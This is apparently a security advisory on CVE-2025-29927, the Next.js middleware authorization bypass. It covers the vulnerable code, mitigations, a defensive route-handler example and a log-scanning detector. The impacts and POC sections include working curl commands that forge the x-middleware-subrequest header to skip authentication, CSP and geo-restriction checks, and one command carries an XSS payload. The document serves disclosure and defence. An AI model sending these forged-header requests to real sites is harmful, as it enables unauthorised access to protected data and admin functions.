Next.js Middleware Authorization Bypass – CVE-2025-29927

Vulnerable Version: prior to 14.2.25 and 15.2.3

Fixed Version: 14.2.25 and 15.2.3

Base Score: 9.1 (Critical)

Vendor Description:-

Next.js is a popular open-source web development framework built on top of React. It enables developers to build fast, SEO-friendly, and scalable web applications with features like server-side rendering (SSR), static site generation (SSG), and API routes—all out of the box. One of its key strengths is simplifying full-stack development by combining frontend and backend logic in a single project structure.

Vulnerability Description:-

CVE-2025-29927 is a flaw in how Next.js middleware handles certain requests; it can lead to authentication and authorization bypasses.

It affects applications that rely on middleware for access control in some deployments.

The vulnerability originates from Next.js' inconsistent handling of the custom x-middleware-subrequest header. When this header is present on a request to a protected route, Next.js allows the request to skip middleware processing entirely: the header tells the runtime that middleware evaluation has already happened, so it proceeds straight to the underlying route handler.

To exploit the flaw, an attacker only needs to add the x-middleware-subrequest header to HTTP requests for protected resources. For example, a request to /api/admin/users that middleware authorization checks would normally block is processed as though middleware had already run and approved it, giving a complete bypass of the check. The header can be added with browser developer tools, curl, or a simple script.


The vulnerable code in the last affected version (v15.2.2) is as follows:

export const run = withTaggedErrors(async function runWithTaggedErrors(params) {
  const runtime = await getRuntimeContext(params)
  // [1] read the internal recursion-tracking header straight from the request
  const subreq = params.request.headers[`x-middleware-subrequest`]
  // [2] split it on ':' into the list of middleware names already visited
  const subrequests = typeof subreq === 'string' ? subreq.split(':') : []

  const MAX_RECURSION_DEPTH = 5
  // [3] count how many entries equal this middleware's own name
  const depth = subrequests.reduce(
    (acc, curr) => (curr === params.name ? acc + 1 : acc),
    0
  )

  // [4] at or above the limit, skip the middleware entirely and tell the
  // runtime to continue to the route ('x-middleware-next': '1')
  if (depth >= MAX_RECURSION_DEPTH) {
    return {
      waitUntil: Promise.resolve(),
      response: new runtime.context.Response(null, {
        headers: {
          'x-middleware-next': '1',
        },
      }),
    }
  }

  // ... the middleware function itself is invoked below this point (omitted here)
})

The x-middleware-subrequest header is read from the request at [1].
It is then split on the : delimiter at [2] and run through a reduce function that counts how many items in the resulting array (subrequests) match the middleware filename at [3].
If that count is equal to or greater than MAX_RECURSION_DEPTH (which is 5) at [4], the middleware is skipped entirely: the runtime receives an x-middleware-next: 1 response and passes the request straight through to its route.

Impacts:-

This vulnerability opens several serious attack paths:

  1. Complete Authentication Bypass
     Attackers can access admin panels, private dashboards, or user data without logging in.

  2. Content Security Policy Bypass
     Middleware often sets CSP headers that prevent cross-site scripting. With this bypass, those protections vanish:

     curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
          -H "Content-Type: text/html" --data "<script>alert('hacked')</script>" \
          http://example-site.com

  3. Geographic Restrictions Bypass
     Many sites use middleware to restrict content by location. This header bypasses those checks:

     curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
          -H "CF-IPCountry: RU" http://example-site.com/eu-only-content

Mitigations

1. Update Next.js (Recommended)

  • Upgrade to Next.js version 15.2.3 or newer, or 14.2.25 or newer

2. Block the Dangerous Header (Temporary Fix)

  • If you can’t update right now, strip the x-middleware-subrequest header at the reverse proxy so it never reaches Next.js:
    • For NGINX (setting the header to an empty string removes it from the proxied request):

      location / {
          proxy_set_header x-middleware-subrequest "";
      }

    • For Apache (requires mod_headers):

      RequestHeader unset x-middleware-subrequest

3. Add Extra Security (Defense-in-Depth)

  • Don’t rely only on middleware for security
  • Add server-side authentication checks (e.g., using NextAuth.js)
  • For sensitive routes, use multiple layers of protection
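As an added defense-in-depth example (not code from this advisory or from the Next.js project), the following route handler makes its own authorization decision from the session cookie, so a request that skipped middleware is still rejected. It runs on plain Node.js 18 or newer using the global Headers and Response classes; the in-memory session store, the cookie name `session`, and the `/api/admin/users` handler shape are assumptions made for the example.

```javascript
// Added example: route-level authorization that does not depend on middleware
// having run. Not from the advisory or the Next.js project. Requires Node.js 18+.

// Constructed in-memory session store standing in for a real session backend.
const SESSIONS = new Map([
  ['sess-admin-001', { user: 'alice', roles: ['admin'] }],
  ['sess-user-002', { user: 'bob', roles: ['user'] }],
]);

// Minimal cookie header parser: "a=1; b=2" -> { a: '1', b: '2' }.
function parseCookies(cookieHeader) {
  const out = {};
  for (const part of (cookieHeader || '').split(';')) {
    const idx = part.indexOf('=');
    if (idx === -1) continue;
    const name = part.slice(0, idx).trim();
    if (name) out[name] = decodeURIComponent(part.slice(idx + 1).trim());
  }
  return out;
}

// Authorization decision made from the request headers alone. Any object with a
// .get(name) method works (the Fetch API Headers class, for instance). The
// x-middleware-subrequest header is never consulted, so a forged copy of it
// changes nothing here.
function authorizeRequest(headers, requiredRole) {
  const { session: sessionId } = parseCookies(headers.get('cookie'));
  const session = sessionId ? SESSIONS.get(sessionId) : undefined;
  if (!session) return { ok: false, status: 401, reason: 'no valid session' };
  if (requiredRole && !session.roles.includes(requiredRole)) {
    return { ok: false, status: 403, reason: `role ${requiredRole} required` };
  }
  return { ok: true, status: 200, user: session.user };
}

// Shape of a Next.js App Router GET handler (hypothetical app/api/admin/users/route.js).
// The handler re-checks authorization itself instead of trusting middleware.
function GET(request) {
  const decision = authorizeRequest(request.headers, 'admin');
  const jsonHeaders = { 'content-type': 'application/json' };
  if (!decision.ok) {
    return new Response(JSON.stringify({ error: decision.reason }),
      { status: decision.status, headers: jsonHeaders });
  }
  return new Response(JSON.stringify({ users: ['alice', 'bob'], requestedBy: decision.user }),
    { status: 200, headers: jsonHeaders });
}
```

A request carrying only the forged x-middleware-subrequest header and no session cookie gets a 401 from the handler itself, and a valid session without the admin role gets a 403. The same `authorizeRequest` check can be reused in Server Components and Server Actions so that middleware becomes one layer among several rather than the only gate.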

POC

If you attempt to access the dashboard without valid credentials, you are redirected to the login page.

[image 6]

To exploit the vulnerability, add the x-middleware-subrequest header with the value middleware:middleware:middleware:middleware:middleware to the request. The Next.js middleware incorrectly honours this header and the authentication check is skipped:

curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://your-ip:3000

[image 7]

As you can see, the dashboard is available without requiring authentication.
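For the detection side, here is an added example (not from the original post) that scans reverse-proxy access logs for client requests carrying the x-middleware-subrequest header. The NDJSON log format with a per-request `headers` object is an assumption for the example, and the sample lines are constructed. The Next.js runtime sets this header itself for its own internal subrequests, so a copy arriving from an external client has no legitimate source; a value that repeats the middleware name five or more times is the pattern described above and is rated high.

```javascript
// Added example (not from the advisory): flag access-log entries whose request
// carried an x-middleware-subrequest header. Log format is assumed to be NDJSON
// with a "headers" object, as a header-logging reverse proxy might emit.

const MAX_RECURSION_DEPTH = 5; // threshold used by the vulnerable Next.js code

// Constructed sample log lines: a normal request, a forged-header request to a
// protected path, a malformed line, a second forged request using a different
// middleware file name, and a request whose header value is below the threshold.
const SAMPLE_LOG = `
{"ts":"2025-03-23T10:00:01Z","src":"203.0.113.7","method":"GET","path":"/dashboard","status":302,"headers":{"user-agent":"Mozilla/5.0"}}
{"ts":"2025-03-23T10:00:05Z","src":"203.0.113.7","method":"GET","path":"/dashboard","status":200,"headers":{"user-agent":"curl/8.5.0","X-Middleware-Subrequest":"middleware:middleware:middleware:middleware:middleware"}}
not json at all
{"ts":"2025-03-23T10:01:00Z","src":"198.51.100.2","method":"GET","path":"/api/admin/users","status":200,"headers":{"x-middleware-subrequest":"src/middleware:src/middleware:src/middleware:src/middleware:src/middleware"}}
{"ts":"2025-03-23T10:02:00Z","src":"192.0.2.9","method":"GET","path":"/","status":200,"headers":{"x-middleware-subrequest":"middleware"}}
`.trim();

// Case-insensitive header lookup on the parsed "headers" object.
function getHeader(headers, name) {
  if (!headers) return undefined;
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
  return key === undefined ? undefined : headers[key];
}

// Highest number of times any single entry repeats in the colon-separated value.
// This mirrors the reduce() in the vulnerable runtime, which counts entries equal
// to its own middleware name, without needing to know that name in advance.
function maxRepeatDepth(value) {
  const counts = new Map();
  for (const item of value.split(':')) counts.set(item, (counts.get(item) || 0) + 1);
  return Math.max(0, ...counts.values());
}

// Returns one finding per request that carried the header. Severity is "high"
// when the value reaches the bypass threshold and "medium" otherwise (the header
// should never arrive from a client at all). Malformed lines are skipped.
function findSubrequestHeaderAbuse(logText) {
  const findings = [];
  for (const line of logText.split('\n')) {
    let entry;
    try { entry = JSON.parse(line); } catch { continue; }
    const value = getHeader(entry.headers, 'x-middleware-subrequest');
    if (typeof value !== 'string') continue;
    const depth = maxRepeatDepth(value);
    findings.push({
      ts: entry.ts,
      src: entry.src,
      path: entry.path,
      status: entry.status,
      depth,
      severity: depth >= MAX_RECURSION_DEPTH ? 'high' : 'medium',
    });
  }
  return findings;
}
```

Run against the constructed sample, the scan yields three findings: two high-severity entries (depth 5) for /dashboard and /api/admin/users, both answered with 200 where the earlier unauthenticated request received a 302, and one medium-severity entry for a single-segment value. A 200 on a protected path paired with this header is the signal worth alerting on while the upgrade is rolled out.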
